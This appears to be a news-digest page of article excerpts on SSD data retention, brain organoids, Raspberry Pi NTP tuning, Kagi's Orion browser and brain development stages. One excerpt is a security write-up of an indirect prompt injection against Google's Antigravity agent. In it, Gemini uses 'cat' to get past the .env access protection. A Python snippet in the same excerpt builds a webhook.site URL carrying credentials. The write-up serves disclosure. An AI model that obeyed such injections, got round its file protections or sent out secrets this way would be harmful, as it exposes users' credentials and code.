10 interesting stories served every morning and every evening.
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
SSDs have all but replaced hard drives when it comes to primary storage. They’re orders of magnitude faster and more convenient than mechanical hard drives, and they consume less power. That said, if you’re also using SSDs for cold storage, expecting the drives lying in your drawer to work perfectly after years, you might want to rethink your strategy. Your reliable SSD could suffer from corrupted or lost data if left unpowered for extended periods. This is why many users don’t consider SSDs a reliable long-term storage medium and prefer hard drives, magnetic tape, or M-Disc instead.
Your SSD data isn’t as permanent as you think
Unlike hard drives that magnetize spinning discs to store data, SSDs modify the electrical charge in NAND flash cells to represent 0 and 1. NAND flash retains data in underlying transistors even when power is removed, similar to other forms of non-volatile memory. However, the duration for which your SSD can retain data without power is the key here. Even the cheapest SSDs, say those with QLC NAND, can safely store data for about a year of being completely unpowered. More expensive TLC NAND can retain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of unpowered storage, respectively.
The problem is that most consumer SSDs use only TLC or QLC NAND, so users who leave their SSDs unpowered for over a year are risking the integrity of their data. The reliability of QLC NAND has improved over the years, but you should still treat 2–3 years without power as the practical upper limit. Without power, the charge stored in the NAND cells can leak away, resulting in missing data or a completely unusable drive.
This data retention deficiency of consumer SSDs makes them an unreliable medium for long-term data storage, especially for creative professionals and researchers. HDDs can suffer from bit rot, too, due to wear and tear, but they’re still more resistant to power loss. If you haven’t checked your archives in a while, I’d recommend doing so at the earliest.
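If you do want to audit a drive you use for archives, one low-effort approach is to keep a checksum manifest next to the data and re-verify it whenever the drive is powered up. Here's a minimal Python sketch of that idea (the archive path and manifest name are just placeholders):

import hashlib
import json
import pathlib

ARCHIVE = pathlib.Path("/mnt/archive")          # placeholder: mount point of the cold-storage SSD
MANIFEST = ARCHIVE / "manifest.sha256.json"     # placeholder manifest file name

def sha256(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while block := f.read(chunk):
            h.update(block)
    return h.hexdigest()

def build_manifest():
    # Run once right after writing the archive: record a checksum for every file.
    sums = {str(p.relative_to(ARCHIVE)): sha256(p)
            for p in ARCHIVE.rglob("*") if p.is_file() and p != MANIFEST}
    MANIFEST.write_text(json.dumps(sums, indent=2))

def verify_manifest():
    # Run whenever the drive is powered up: flag anything missing or changed.
    sums = json.loads(MANIFEST.read_text())
    for rel, expected in sums.items():
        p = ARCHIVE / rel
        if not p.exists():
            print(f"MISSING  {rel}")
        elif sha256(p) != expected:
            print(f"CORRUPT  {rel}")

if __name__ == "__main__":
    verify_manifest()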
But, most people don’t need to worry about it
The scenario I described above isn’t relevant to people outside enterprise, enthusiast, and solopreneur usage. The need to store tons of data for years on drives that aren’t plugged in isn’t a concern for most people, who use one or two SSDs in their PC that might be left without power for a few months at most. If you’ve ever lost data on an SSD, the culprit was more likely a rare power surge or a faulty drive than charge leakage. That said, factors like temperature and the quality of the underlying NAND flash can accelerate how quickly an unpowered drive loses its charge.
SSDs aren’t eternal, even if you keep them powered on forever. The limited write cycles of NAND flash will eventually bring an SSD to the end of its lifecycle, but the majority of users will probably replace the drive before that ever happens. So, you don’t need to worry about writing too much data to your SSD or leaving your PC turned off for days, weeks, or even months. Just don’t trust an unpowered SSD that’s gathering dust in the house for years, which brings me to my next point.
You should always have a backup anyway
Prevention is better than cure
Backing up your data is the simplest strategy to counteract the limitations of storage media. Having multiple copies of your data on different types of storage ensures that an unexpected incident doesn’t make it vanish forever. This is exactly what the 3-2-1 backup rule prescribes: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.
Whether it’s the limited lifespan of your SSD, the potential for harmful exigencies like power failure, or the limits of data retention on flash storage, your backup will ensure your peace of mind. Yes, SSDs aren’t the best choice for cold storage, but even if you’re using hard drives, having a single copy of your data is asking for trouble. Every user will come face-to-face with drive failure sooner or later, so investing in a robust backup system isn’t really optional if you care about your data.
“Store it and forget it” doesn’t work for SSDs
As long as you’re using consumer SSDs for primary storage on your PC, it’s all well and good. You’ll most likely replace your drive long before exhausting its P/E cycles. For long-term storage, however, relying on SSDs is risky, since they can lose data if left without power for years. This data loss can occur anytime from 1 to 3 years of keeping your SSDs unpowered, so using alternate storage media and investing in a backup system should be your priorities.
...
Read the original on www.xda-developers.com »
Humans have long wondered when and how we begin to form thoughts. Are we born with a pre-configured brain, or do thought patterns only begin to emerge in response to our sensory experiences of the world around us? Now, science is getting closer to answering the questions philosophers have pondered for centuries.
Researchers at the University of California, Santa Cruz, are using tiny models of human brain tissue, called organoids, to study the earliest moments of electrical activity in the brain. A new study in Nature Neuroscience finds that the earliest firings of the brain occur in structured patterns without any external experiences, suggesting that the human brain is preconfigured with instructions about how to navigate and interact with the world.
“These cells are clearly interacting with each other and forming circuits that self-assemble before we can experience anything from the outside world,” said Tal Sharf, assistant professor of biomolecular engineering at the Baskin School of Engineering and the study’s senior author. “There’s an operating system that exists, that emerges in a primordial state. In my laboratory, we grow brain organoids to peer into this primordial version of the brain’s operating system and study how the brain builds itself before it’s shaped by sensory experience.”
In improving our fundamental understanding of human brain development, these findings can help researchers better understand neurodevelopmental disorders and pinpoint the impact of toxins like pesticides and microplastics on the developing brain.
The brain, similar to a computer, runs on electrical signals—the firing of neurons. When these signals begin to fire, and how the human brain develops, are challenging topics for scientists to study, as the early developing human brain is protected within the womb.
Organoids, which are 3D models of tissue grown from human stem cells in the lab, provide a unique window into brain development. The Braingeneers group at UC Santa Cruz, in collaboration with researchers at UC San Francisco and UC Santa Barbara, are pioneering methods to grow these models and take measurements from them to gain insights into brain development and disorders.
Organoids are particularly useful for understanding if the brain develops in response to sensory input—as they exist in the lab setting and not the body—and can be grown ethically in large quantities. In this study, researchers prompted stem cells to form brain tissue, and then measured its electrical activity using specialized microchips, similar to those that run a computer. Sharf’s background in applied physics, computation, and neurobiology forms the basis of his expertise in modelling the circuitry of the early brain.
“An organoid system that’s intrinsically decoupled from any sensory input or communication with organs gives you a window into what’s happening with this self-assembly process,” Sharf said. “That self-assembly process is really hard to do with traditional 2D cell culture—you can’t get the cell diversity and the architecture. The cells need to be in intimate contact with each other. We’re trying to control the initial conditions, so we can let biology do its wonderful thing.”
The Sharf lab is developing novel neural interfaces, leveraging expertise in physics, materials science, and electrical engineering. On the right, Koushik Devarajan, an electrical and computer engineering Ph.D. student in the Sharf lab.
The researchers observed the electrical activity of the brain tissue as it self-assembled from stem cells into a tissue that can translate the senses and produce language and conscious thought. They found that within the first few months of development, long before the human brain is capable of receiving and processing complex external sensory information such as vision and hearing, its cells spontaneously began to emit electrical signals characteristic of the patterns that underlie translation of the senses.
Through decades of neuroscience research, the community has discovered that neurons fire in patterns that aren’t just random. Instead, the brain has a “default mode” — a basic underlying structure for firing neurons which then becomes more specific as the brain processes unique signals like a smell or taste. This background mode outlines the possible range of sensory responses the body and brain can produce.
In their observations of single neuron spikes in the self-assembling organoid models, Sharf and colleagues found that these earliest observable patterns have a striking similarity to the brain’s default mode. Even without having received any sensory input, the organoids fire off a complex repertoire of time-based patterns, or sequences, which have the potential to be refined for specific senses, hinting at a genetically encoded blueprint inherent to the neural architecture of the living brain.
“These intrinsically self-organized systems could serve as a basis for constructing a representation of the world around us,” Sharf said. “The fact that we can see them in these early stages suggests that evolution has figured out a way that the central nervous system can construct a map that would allow us to navigate and interact with the world.”
Knowing that these organoids produce the basic structure of the living brain opens up a range of possibilities for better understanding human neurodevelopment, disease, and the effects of toxins in the brain.
“We’re showing that there is a basis for capturing complex dynamics that likely could be signatures of pathological onsets that we could study in human tissue,” Sharf said. “That would allow us to develop therapies, working with clinicians at the preclinical level to potentially develop compounds, drug therapies, and gene editing tools that could be cheaper, more efficient, higher throughput.”
This study included researchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.
...
Read the original on news.ucsc.edu »
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1 point font.
a. Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
a. Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
d. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending it to a webhook.site domain that is monitored by the attacker.
e. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site lets anyone create a URL and monitor every request made to it.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored in the URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.
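To make the exfiltration mechanism concrete: the URL the injection asks Gemini to build is nothing more than percent-encoded stolen text appended to an attacker-monitored endpoint. A rough Python illustration, with the webhook ID, credentials, and code snippet all invented for the example:

from urllib.parse import quote

# All values below are made up; they stand in for what the agent would have gathered.
webhook = "https://webhook.site/00000000-0000-0000-0000-000000000000"
env_contents = "ORACLE_ERP_API_KEY=sk-example-123\nDB_PASSWORD=hunter2"
code_snippet = "def pay_invoice(invoice_id): ..."

# Percent-encode the text so it survives as query parameters, then append it to the
# attacker-monitored domain. Simply opening this URL in a browser subagent is enough
# for the request (and therefore the data) to show up in the attacker's logs.
exfil_url = f"{webhook}/?env={quote(env_contents)}&code={quote(code_snippet)}"
print(exfil_url)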
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
...
Read the original on github.com »
I’ve written before about building microsecond-accurate NTP servers with Raspberry Pi and GPS PPS, and more recently about revisiting the setup in 2025. Both posts focused on the hardware setup and basic configuration to achieve sub-microsecond time synchronization using GPS Pulse Per Second (PPS) signals.
But there was a problem. Despite having a stable PPS reference, my NTP server’s frequency drift was exhibiting significant variation over time. After months (years) of monitoring the system with Grafana dashboards, I noticed something interesting: the frequency oscillations seemed to correlate with CPU temperature changes. The frequency would drift as the CPU heated up during the day and cooled down at night, even though the PPS reference remained rock-solid.
Like clockwork (no pun intended), I somehow get sucked back into trying to improve my setup every 6-8 weeks. This post is the latest on that never-ending quest.
This post details how I achieved an 81% reduction in frequency variability and 77% reduction in frequency standard deviation through a combination of CPU core pinning and thermal stabilization. Welcome to Austin’s Nerdy Things, where we solve problems that 99.999% of people (and 99% of datacenters) don’t have.
Modern CPUs, including those in Raspberry Pis, use dynamic frequency scaling to save power and manage heat. When the CPU is idle, it runs at a lower frequency (and voltage). When load increases, it scales up. This is great for power efficiency, but terrible for precision timekeeping.
Why? Because timekeeping (with NTP/chronyd/others) relies on a stable system clock to discipline itself against reference sources. If the CPU frequency is constantly changing, the system clock’s tick rate varies, introducing jitter into the timing measurements. Even though my PPS signal was providing a mostly perfect 1-pulse-per-second reference, the CPU’s frequency bouncing around made it harder for chronyd to maintain a stable lock.
But here’s the key insight: the system clock is ultimately derived from a crystal oscillator, and crystal oscillator frequency is temperature-dependent. The oscillator sits on the board near the CPU, and as the CPU heats up and cools down throughout the day, so does the crystal. Even a few degrees of temperature change can shift the oscillator’s frequency by parts per million — exactly what I was seeing in my frequency drift graphs. The CPU frequency scaling was one factor, but the underlying problem was that temperature changes were affecting the crystal oscillator itself. By stabilizing the CPU temperature, I could stabilize the thermal environment for the crystal oscillator, keeping its frequency consistent.
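To put “parts per million” in perspective, the arithmetic is simple: a frequency error of 1 PPM, left uncorrected, accumulates to about 86 ms of clock error per day. Chrony continuously steers that error out, but a crystal whose frequency wanders with temperature makes the steering visibly noisier. A quick sketch of the math (mine, not from the original post):

SECONDS_PER_DAY = 86_400

def drift_ms_per_day(ppm_error: float) -> float:
    """Clock drift in milliseconds per day for a given frequency error in PPM."""
    return ppm_error * 1e-6 * SECONDS_PER_DAY * 1e3

for ppm in (0.1, 0.5, 1.0):
    print(f"{ppm:3.1f} PPM -> {drift_ms_per_day(ppm):6.2f} ms/day if never corrected")

# 1.0 PPM works out to 86.40 ms/day, so a ~1 PPM wander is a large error by PPS
# standards, even though chrony keeps the absolute offset down in the nanoseconds.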
Looking at my Grafana dashboard, I could see the frequency offset wandering over a range of about 1 PPM (parts per million) as the Pi warmed up and cooled down throughout the day. The RMS offset was averaging around 86 nanoseconds, which isn’t terrible (it’s actually really, really, really good), but I knew it could be better.
After staring at graphs for longer than I’d like to admit, I had an idea: what if I could keep the CPU at a constant temperature? If the temperature (and therefore the frequency) stayed stable, maybe the timing would stabilize too.
The solution came in two parts:
1. CPU core isolation — Dedicate CPU 0 exclusively to timing-critical tasks (chronyd and PPS interrupts)
2. Thermal stabilization — Keep the other CPUs busy to maintain a constant temperature, preventing frequency scaling
Here’s what happened when I turned on the thermal stabilization system on November 17, 2025 at 09:10 AM:
Same-ish graph, but with CPU temp also plotted:
That vertical red line marks on the first plot when I activated the “time burner” process. Notice how the frequency oscillations immediately dampen and settle into a much tighter band? Let’s dive into how this works.
EDIT: 2025-11-25 I didn’t expect to wake up and see this at #2 on Hacker News — https://news.ycombinator.com/item?id=46042946
The first step is isolating timing-critical operations onto a dedicated CPU core. On a Raspberry Pi (4-core ARM), this means:
* CPU 0: Timing-critical work only (chronyd and the PPS interrupt)
* CPUs 1-3: Everything else, including our thermal load
I had AI (probably Claude Sonnet 4 ish, maybe 4.5) create a boot optimization script that runs at system startup:
#!/bin/bash
# PPS NTP Server Performance Optimization Script
# Sets CPU affinity, priorities, and performance governor at boot

set -e

echo "Setting up PPS NTP server performance optimizations..."

# Wait for system to be ready
sleep 5

# Set CPU governor to performance mode
echo "Setting CPU governor to performance..."
cpupower frequency-set -g performance

# Pin PPS interrupt to CPU0 (may fail if already pinned, that's OK)
echo "Configuring PPS interrupt affinity..."
echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo "PPS IRQ already configured"

# Wait for chronyd to start
echo "Waiting for chronyd to start..."
timeout=30
while [ $timeout -gt 0 ]; do
    chronyd_pid=$(pgrep chronyd 2>/dev/null || echo "")
    if [ -n "$chronyd_pid" ]; then
        echo "Found chronyd PID: $chronyd_pid"
        break
    fi
    sleep 1
    ((timeout--))
done

if [ -z "$chronyd_pid" ]; then
    echo "Warning: chronyd not found after 30 seconds"
else
    # Set chronyd to real-time priority and pin to CPU 0
    echo "Setting chronyd to real-time priority and pinning to CPU 0..."
    chrt -f -p 50 $chronyd_pid
    taskset -cp 0 $chronyd_pid
fi

# Boost ksoftirqd/0 priority
echo "Boosting ksoftirqd/0 priority..."
ksoftirqd_pid=$(ps aux | grep '\[ksoftirqd/0\]' | grep -v grep | awk '{print $2}')
if [ -n "$ksoftirqd_pid" ]; then
    renice -n -10 $ksoftirqd_pid
    echo "ksoftirqd/0 priority boosted (PID: $ksoftirqd_pid)"
else
    echo "Warning: ksoftirqd/0 not found"
fi

echo "PPS NTP optimization complete!"

# Log current status
echo "=== Current Status ==="
echo "CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)"
echo "PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo 'not readable')"
if [ -n "$chronyd_pid" ]; then
    echo "chronyd Priority: $(chrt -p $chronyd_pid)"
fi
echo "======================"
What this does:
Performance Governor: Forces all CPUs to run at maximum frequency, disabling frequency scaling
PPS Interrupt Affinity: Pins the PPS interrupt (IRQ 200 here) to CPU 0
chronyd Pinning and Priority: Gives chronyd real-time (SCHED_FIFO) priority and pins it to CPU 0
ksoftirqd Priority Boost: Improves priority of the kernel softirq handler on CPU 0
This script can be added to /etc/rc.local or as a systemd service to run at boot.
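If you go the systemd route, a simple oneshot unit is enough. A minimal sketch (the unit name and script path here are hypothetical; substitute your own):

# /etc/systemd/system/pps-ntp-tuning.service (hypothetical name and path)
[Unit]
Description=PPS NTP server performance optimizations
# Start after chrony so the script can find and re-prioritize chronyd
After=chrony.service
Wants=chrony.service

[Service]
Type=oneshot
ExecStart=/usr/local/sbin/pps-ntp-optimize.sh
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Enable it with: systemctl daemon-reload && systemctl enable --now pps-ntp-tuning.service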
Setting the performance governor helps, but on a Raspberry Pi, even at max frequency, the CPU temperature will still vary based on ambient conditions and load. Temperature changes affect the CPU’s actual operating frequency due to thermal characteristics of the silicon.
The solution? Keep the CPU at a constant temperature using a PID-controlled thermal load. I call it the “time burner” (inspired by CPU burn-in tools, but with precise temperature control).
As a reminder of what we’re really doing here: we’re maintaining a stable thermal environment for the crystal oscillator. The RPi 3B’s 19.2 MHz oscillator is physically located near the CPU on the Raspberry Pi board, so by actively controlling CPU temperature, we’re indirectly controlling the oscillator’s temperature. Since the oscillator’s frequency is temperature-dependent (this is basic physics of quartz crystals), keeping it at a constant temperature means keeping its frequency stable — which is exactly what we need for precise timekeeping.
PID controller calculates how much CPU time to burn to maintain target temperature (I chose 54°C)
Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)
Each worker alternates between busy-loop (MD5 hashing) and sleeping based on PID output
#!/usr/bin/env python3
import time
import argparse
import multiprocessing
import hashlib
import os
from collections import deque


class PIDController:
    """Simple PID controller with output clamping and anti-windup."""

    def __init__(self, Kp, Ki, Kd, setpoint, output_limits=(0, 1), sample_time=1.0):
        self.Kp = Kp
        self.Ki = Ki
        self.Kd = Kd
        self.setpoint = setpoint
        self.output_limits = output_limits
        self.sample_time = sample_time
        self._last_time = time.time()
        self._last_error = 0.0
        self._integral = 0.0
        self._last_output = 0.0

    def update(self, measurement):
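        # [The article's listing is truncated at this point. For reference only --
        #  this is NOT the author's code -- a textbook PID update with output
        #  clamping and anti-windup, matching the docstring above, looks roughly like:
        #
        #      now = time.time()
        #      dt = now - self._last_time
        #      if dt < self.sample_time:
        #          return self._last_output
        #      error = self.setpoint - measurement
        #      self._integral += error * dt
        #      derivative = (error - self._last_error) / dt
        #      output = self.Kp * error + self.Ki * self._integral + self.Kd * derivative
        #      low, high = self.output_limits
        #      output = max(low, min(high, output))      # clamp to the 0..1 duty cycle
        #      if output in (low, high):
        #          self._integral -= error * dt          # simple anti-windup
        #      self._last_time, self._last_error, self._last_output = now, error, output
        #      return output
        # ]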
...
Read the original on austinsnerdythings.com »
After six years of relentless development, Orion for MacOS 1.0 is here.
What started as a vision initiated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for macOS officially leaves its beta phase behind and joins our iOS and iPadOS apps as a fully‑fledged, production‑ready browser.
While doing so, it expands the Kagi ecosystem of privacy-respecting, user-centric products (which we have begun fondly calling the “Kagiverse”) to now include Search, Assistant, Browser, Translate, and News, with more to come.
We built Orion for people who feel that modern browsing has drifted too far from serving the user. This is our invitation to browse beyond ✴︎ the status quo.
The obvious question is: why the heck do we need a new browser? The world already has Chrome, Safari, Firefox, Edge, and a growing list of “AI browsers.” Why add yet another?
Because something fundamental has been lost.
Your browser is the most intimate tool you have on your computer. It sees everything you read, everything you search, everything you type. Do you want that relationship funded by advertisers, or by you?
With ad‑funded browsers and AI overlays, your activity is a gold mine. Every click becomes a way to track, every page another opportunity to profile you a little more deeply. We believe there needs to be a different path: a browser that answers only to its user.
Orion is our attempt at that browser. No trade-offs between features and privacy. It’s fast, customizable, and uncompromising on both fronts.
In a world dominated by Chromium, choosing a rendering engine is an act of resistance.
From day one, we made the deliberate choice to build Orion on WebKit, the open‑source engine at the heart of Safari and the broader Apple ecosystem. It gives us:
* A high‑performance engine that is deeply optimized for macOS and iOS.
* An alternative to the growing Chromium monoculture.
* A foundation that is not controlled by an advertising giant.
Orion may feel familiar if you’re used to Safari — respecting your muscle memory and the aesthetics of macOS and iOS — but it is an entirely different beast under the hood. We combined native WebKit speed with a completely new approach to extensions, privacy, and customization.
Most people switch browsers for one reason: speed.
Orion is designed to be fast by nature, not just in benchmarks, but in how it feels every day:
* A UI that gets out of your way and gives you more screen real estate for content.
* Zero Telemetry: We don’t collect usage data. No analytics, no identifiers, no tracking.
* No ad or tracking technology baked in: Orion is not funded by ads, so there is no incentive to follow you around the web.
* Built‑in protections: Strong content blocking and privacy defaults from the first launch.
We are excited about what AI can do for search, browsing, and productivity. Kagi, the company behind Orion, has been experimenting with AI‑powered tools for years while staying true to our AI integration philosophy.
But we are also watching a worrying trend: AI agents are being rushed directly into the browser core, with deep access to everything you do online — and sometimes even to your local machine.
Security researchers have already documented serious issues in early AI browsers and “agentic” browser features:
* Hidden or undocumented APIs that allowed embedded AI components to execute arbitrary local commands on users’ devices.
* Prompt‑injection attacks that trick AI agents into ignoring safety rules, visiting malicious sites, or leaking sensitive information beyond what traditional browser sandboxes were designed to protect.
* Broader concerns that some implementations are effectively “lighting everything on fire” by expanding the browser’s attack surface and data flows in ways users don’t fully understand.
* We are not against AI, and we are conscious of its limitations. We already integrate with AI‑powered services wherever it makes functional sense and will continue to expand those capabilities.
* We are against rushing insecure, always‑on agents into the browser core. Your browser should be a secure gateway, not an unvetted co‑pilot wired into everything you do.
* Orion ships with no built‑in AI code in its core.
* We focus on providing a clean, predictable environment, especially for enterprises and privacy‑conscious professionals.
* Orion is designed to connect seamlessly to the AI tools you choose — soon including Kagi’s intelligent features — while keeping a clear separation between your browser and any external AI agents.
As AI matures and security models improve, we’ll continue to evaluate thoughtful, user‑controlled ways to bring AI into your workflow without compromising safety, privacy or user choice.
We designed Orion to bridge the gap between simplicity and power. Out of the box, it’s a clean, intuitive browser for anyone. Under the hood, it’s a deep toolbox for people who live in their browser all day.
Some of the unique features you’ll find in Orion 1.0:
* Focus Mode: Instantly transform any website into a distraction‑free web app. Perfect for documentation, writing, or web apps you run all day.
* Link Preview: Peek at content from any app — email, notes, chat — without fully committing to opening a tab, keeping your workspace tidy.
* Mini Toolbar, Overflow Menu, and Page Tweak: Fine‑tune each page’s appearance and controls, so the web adapts to you, not the other way around.
* Profiles as Apps: Isolate your work, personal, and hobby browsing into completely separate profiles, each with its own extensions, cookies, and settings.
For power users, we’ve added granular options throughout the browser. These are there when you want them, and out of your way when you don’t.
Orion 1.0 also reflects six years of feedback from early adopters. Many invisible improvements — tab stability, memory behavior, complex web app compatibility — are a direct result of people pushing Orion hard in their daily workflows and telling us what broke.
With this release, we are introducing our new signature: Browse Beyond ✴︎.
We originally started with the browser name ‘Kagi.’ On February 3, 2020, Vlad suggested a shortlist for rebranding: Comet, Core, Blaze, and Orion. We chose Orion not just for the name itself, but because it perfectly captured our drive for exploration and curiosity. It was a natural fit that set the stage for everything that followed.
You’ll see this reflected in our refreshed visual identity:
* A refined logo that now uses the same typeface as Kagi, creating a clear visual bond between our browser and our search engine.
Orion is part of the broader Kagi ecosystem, united by a simple idea: the internet should be built for people, not advertisers or any other third parties.
Orion is built by a team of just six developers.
To put that in perspective:
* That’s roughly 10% of the size of the “small” browser teams at larger companies.
* And a rounding error compared to the teams behind Chrome or Edge.
Yet, the impact is real: over 1 million downloads to date, and a dedicated community of 2480 paid subscribers who make this independence possible.
For the first two years, development was carried out by a single developer. Today, we are a tight-knit group operating close to our users. We listen, debate, and implement fixes proposed directly by our community on OrionFeedback.org.
This is our only source of decision making, rather than any usage analytics or patterns, because remember, Orion is zero-telemetry!
This small team approach lets us move quickly, stay focused, and avoid the bloat or hype that often comes with scale.
Orion is free for everyone.
Every user also receives 200 free Kagi searches, with no account or sign‑up required. It’s our way of introducing you to fast, ad‑free, privacy‑respecting search from day one.
But we are also 100% self‑funded. We don’t sell your data and we don’t take money from advertisers, which means we rely directly on our users to sustain the project.
There are three ways to contribute to Orion’s future:
* Tip Jar (from the app): A simple way to say “thank you” without any commitment.
Supporters (via subscription or lifetime purchase) unlock a set of Orion+ perks available today, including:
* Floating windows: Keep a video or window on top of other apps.
* Early access to new, supporter‑exclusive features we’re already building for next year.
By supporting Orion, you’re not just funding a browser — you are co‑funding a better web with humans at the center.
Orion 1.0 is just the beginning. Our goal is simple: Browse Beyond, everywhere.
* Orion for macOS
Our flagship browser, six years in the making. Built natively for Mac, with performance and detail that only come from living on the platform for a long time. Download it now.
* Orion for iOS and iPadOS
Trusted daily by users who want features no other mobile browser offers. Native iOS performance with capabilities that redefine what’s possible on mobile. Download it now.
* Orion for Linux (Alpha)
Currently in alpha for users who value choice and independence. Native Linux performance, with the same privacy‑first approach as on macOS.
Sign up for our newsletter to follow development and join the early testing wave.
* Orion for Windows (in development)
We have officially started development on Orion for Windows, with a target release scheduled for late 2026. Our goal is full parity with Orion 1.0 for macOS, including synchronized profiles and Orion+ benefits across platforms. Sign up for our newsletter to follow development and join the early testing wave.
Synchronization will work seamlessly across devices, so your browsing experience follows you, not the other way around.
From early testers to privacy advocates and power users, Orion has grown through the voices of its community.
We’ll continue to surface community stories and feedback as Orion evolves. If you share your experience publicly, there’s a good chance we’ll see it.
Hitting v1.0 is a big milestone, but we’re just getting started.
Over the next year, our roadmap is densely packed with:
* Further improvements to stability and complex web app performance.
* New Orion+ features that push what a browser can do while keeping it simple for everyone else.
* Tighter integrations with Kagi’s intelligent tools — always under your control, never forced into your workflow.
We’re also working on expanding and improving our website to better showcase everything Orion can do, including better documentation and onboarding for teams that want to standardize on Orion.
Meanwhile, follow our X account where we’ll be dropping little freebies on the regular (and don’t worry, we’ll be posting these elsewhere on socials as well!)
Thank you for choosing to Browse Beyond with us.
...
Read the original on blog.kagi.com »
Scientists have identified five major “epochs” of human brain development in one of the most comprehensive studies to date of how neural wiring changes from infancy to old age.
The study, based on the brain scans of nearly 4,000 people aged under one to 90, mapped neural connections and how they evolve during our lives. This revealed five broad phases, split up by four pivotal “turning points” in which brain organisation moves on to a different trajectory, at around the ages of nine, 32, 66 and 83 years.
“Looking back, many of us feel our lives have been characterised by different phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a researcher in neuroinformatics at Cambridge University and senior author of the study.
“Understanding that the brain’s structural journey is not a question of steady progression, but rather one of a few major turning points, will help us identify when and how its wiring is vulnerable to disruption.”
The childhood period of development was found to occur between birth until the age of nine, when it transitions to the adolescent phase — an era that lasts up to the age of 32, on average.
In a person’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, lasting more than three decades. A third turning point around the age of 66 marks the start of an “early ageing” phase of brain architecture. Finally, the “late ageing” brain takes shape at around 83 years old.
The scientists quantified brain organisation using 12 different measures, including the efficiency of the wiring, how compartmentalised it is and whether the brain relies heavily on central hubs or has a more diffuse connectivity network.
From infancy through childhood, our brains are defined by “network consolidation”, as the wealth of synapses — the connectors between neurons — in a baby’s brain are whittled down, with the more active ones surviving. During this period, the study found, the efficiency of the brain’s wiring decreases.
